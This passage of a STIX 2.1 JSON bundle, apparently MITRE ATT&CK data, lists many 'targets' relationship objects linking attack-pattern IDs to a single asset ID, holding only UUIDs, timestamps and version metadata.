[], "modified": "2024-07-01T10:37:15.825580", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3f18edba-28f4-4bb9-82c3-8aa60dcac5f7", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--cb9d7bfa-cbaa-4fa5-83eb-a50208102524", "created": "2024-07-01T10:37:15.825588", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825590", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3cd45bb1-f15e-429d-9b7c-1f9535573e9a", "created": "2024-07-01T10:37:15.825598", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825600", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3fc01293-ef5e-41c6-86ce-61f10706b64a", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--47e462db-e2d3-4592-af1c-b207eb22ec27", "created": "2024-07-01T10:37:15.825608", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825610", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3fc9b85a-2862-4363-a64d-d692e3ffbee0", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--23a7178e-2d7d-4bca-8bc5-f7fbea93a9a9", "created": "2024-07-01T10:37:15.825618", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825620", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--40597f16-0963-4249-bf4c-ac93b7fb9807", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--31753c83-53c3-4bf9-be71-37fe4a88fb23", "created": "2024-07-01T10:37:15.825628", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825630", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4061e78c-1284-44b4-9116-73e4ac3912f7", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--38b295d0-e730-4887-9417-6d396002e554", "created": "2024-07-01T10:37:15.825638", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825640", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--41868330-6ee2-4d0f-b743-9f2294c3c9b6", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--582b9409-8190-482c-8de4-8b22b7fb1d59", "created": "2024-07-01T10:37:15.825648", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825650", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2fde305e-5028-46ce-9c20-f25498d3a565", "created": "2024-07-01T10:37:15.825658", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825661", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--435dfb86-2697-4867-85b5-2fef496c0517", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--00df6c51-4469-4775-901c-b297f2a8078b", "created": "2024-07-01T10:37:15.825669", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825671", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--438c967d-3996-4870-bfc2-3954752a1927", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d5447191-817e-4e57-9fa3-6c7ebe78e331", "created": "2024-07-01T10:37:15.825679", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825681", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--43c9bc06-715b-42db-972f-52d25c09a20c", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e2094e4e-24fe-4339-bb24-1d205bbb35ba", "created": "2024-07-01T10:37:15.825689", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825691", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a082cc27-e3da-417e-8303-244df879236c", "created": "2024-07-01T10:37:15.825699", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825701", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--43f2776f-b4bd-4118-94b8-fee47e69676d", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0a5f092c-8337-4fc7-91f3-6dfee0532303", "created": "2024-07-01T10:37:15.825709", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825711", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--451a9977-d255-43c9-b431-66de80130c8c", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3883ae70-cda6-4e44-8eab-989645f9eb51", "created": "2024-07-01T10:37:15.825719", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825721", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--457c7820-d331-465a-915e-42f85500ccc4", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--68d573c0-7a5e-4a73-a007-fa773974cb71", "created": "2024-07-01T10:37:15.825729", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825731", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d91c8d81-6de8-4117-b550-7b193ad00564", "created": "2024-07-01T10:37:15.825739", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825741", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4933e63b-9b77-476e-ab29-761bc5b7d15a", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f94bee33-70fb-4a75-9ebe-4cf0ceef8eb7", "created": "2024-07-01T10:37:15.825749", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825751", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--494ab9f0-36e0-4b06-b10d-57285b040a06", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4a7fe14c-9487-49d2-a93b-ce206eb1c94d", "created": "2024-07-01T10:37:15.825759", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825761", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4a2975db-414e-4c0c-bd92-775987514b4b", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7eda8dea-ba54-4753-ad83-7a828158edbd", "created": "2024-07-01T10:37:15.825769", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825771", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4a5b7ade-8bb5-4853-84ed-23f262002665", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--28083ff1-9510-4693-98f2-fac78e88b4ff", "created": "2024-07-01T10:37:15.825780", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825782", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4ae4f953-fe58-4cc8-a327-33257e30a830", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--56741f19-077d-404b-874b-548577f68d6b", "created": "2024-07-01T10:37:15.825790", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825792", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3a48b585-9f29-4b63-a237-b4b94ba141bd", "created": "2024-07-01T10:37:15.825800", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825802", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4d2a5b3e-340d-4600-9123-309dd63c9bf8", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--15d4bf78-11b6-4594-a1a2-a2e80323ec8c", "created": "2024-07-01T10:37:15.825810", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825812", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4eeaf8a9-c86b-4954-a663-9555fb406466", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f7f5c813-2a58-4163-a561-5660a3fe8b80", "created": "2024-07-01T10:37:15.825820", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825822", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4fe28b27-b13c-453e-a386-c2ef362a573b", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--002457de-c110-4062-a274-d9113f8e9d28", "created": "2024-07-01T10:37:15.825830", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825832", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--51ea26b1-ff1e-4faa-b1a0-1114cd298c87", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--be830dc7-afb6-45a6-b524-23b06b876b59", "created": "2024-07-01T10:37:15.825840", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825843", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5372c5fe-f424-4def-bcd5-d3a8e770f07b", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9339e091-99be-4d93-9048-22074bf901a1", "created": "2024-07-01T10:37:15.825850", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825853", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--91075eba-cd46-471a-8c15-72f20a3161b9", "created": "2024-07-01T10:37:15.825860", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825863", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--54a649ff-439a-41a4-9856-8d144a2551ba", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ae0fe354-10d8-4216-8593-04c39db04ce0", "created": "2024-07-01T10:37:15.825871", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825873", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--54b4c251-1f0e-4eba-ba6b-dbc7a6f6f06b", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--45d6db08-1853-4ff1-bb4f-5e634d5cc75c", "created": "2024-07-01T10:37:15.825881", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825883", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--561ae9aa-c28a-4144-9eec-e7027a14c8c3", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--74ee79c4-e9f6-4460-ab66-39f3775485bd", "created": "2024-07-01T10:37:15.825891", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825893", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--562e9b64-7239-493d-80f4-2bff900d9054", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b7cfa9dc-786d-4081-a4a8-ae63fb16cca0", "created": "2024-07-01T10:37:15.825901", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825903", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b5cddbce-9a91-4b62-b907-6ec57a6d9a5a", "created": "2024-07-01T10:37:15.825911", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825913", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5909f20f-3c39-4795-be06-ef1ea40d350b", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c39e4c17-aeba-4700-b2c1-35ff5b18c02f", "created": "2024-07-01T10:37:15.825921", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825923", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--59ff91cd-1430-4075-8563-e6f15f4f9ff5", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ed696080-ebdf-4313-9f03-d8ae02e0f97c", "created": "2024-07-01T10:37:15.825931", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825933", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5b0ad6f8-6a16-4966-a4ef-d09ea6e2a9f5", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2441652a-f5a5-4c34-b922-99878ada82cf", "created": "2024-07-01T10:37:15.825941", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825943", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5bfccc3f-2326-4112-86cc-c1ece9d8a2b5", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0d1eac2b-3829-45b8-a7c5-f89d379bf4f2", "created": "2024-07-01T10:37:15.825952", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825954", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5d0d3609-d06d-49e1-b9c9-b544e0c618cb", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5937f3a2-c906-4092-ae85-28d8c3403852", "created": "2024-07-01T10:37:15.825962", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825964", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5e4a2073-9643-44cb-a0b5-e7f4048446c7", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--cd84f0f4-aa02-4b5b-9d5d-2a5c61c37bb4", "created": "2024-07-01T10:37:15.825972", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825974", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--60b508a1-6a5e-46b1-821a-9f7b78752abf", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a15e96f7-e4d6-4703-bee5-93e819e72aec", "created": "2024-07-01T10:37:15.825982", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825984", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--613d08bc-e8f4-4791-80b0-c8b974340dfd", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f8549e3d-bbb1-4446-9d77-5902d59a7ad3", "created": "2024-07-01T10:37:15.825992", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.825994", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--6151cbea-819b-455a-9fa6-99a1cc58797d", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", 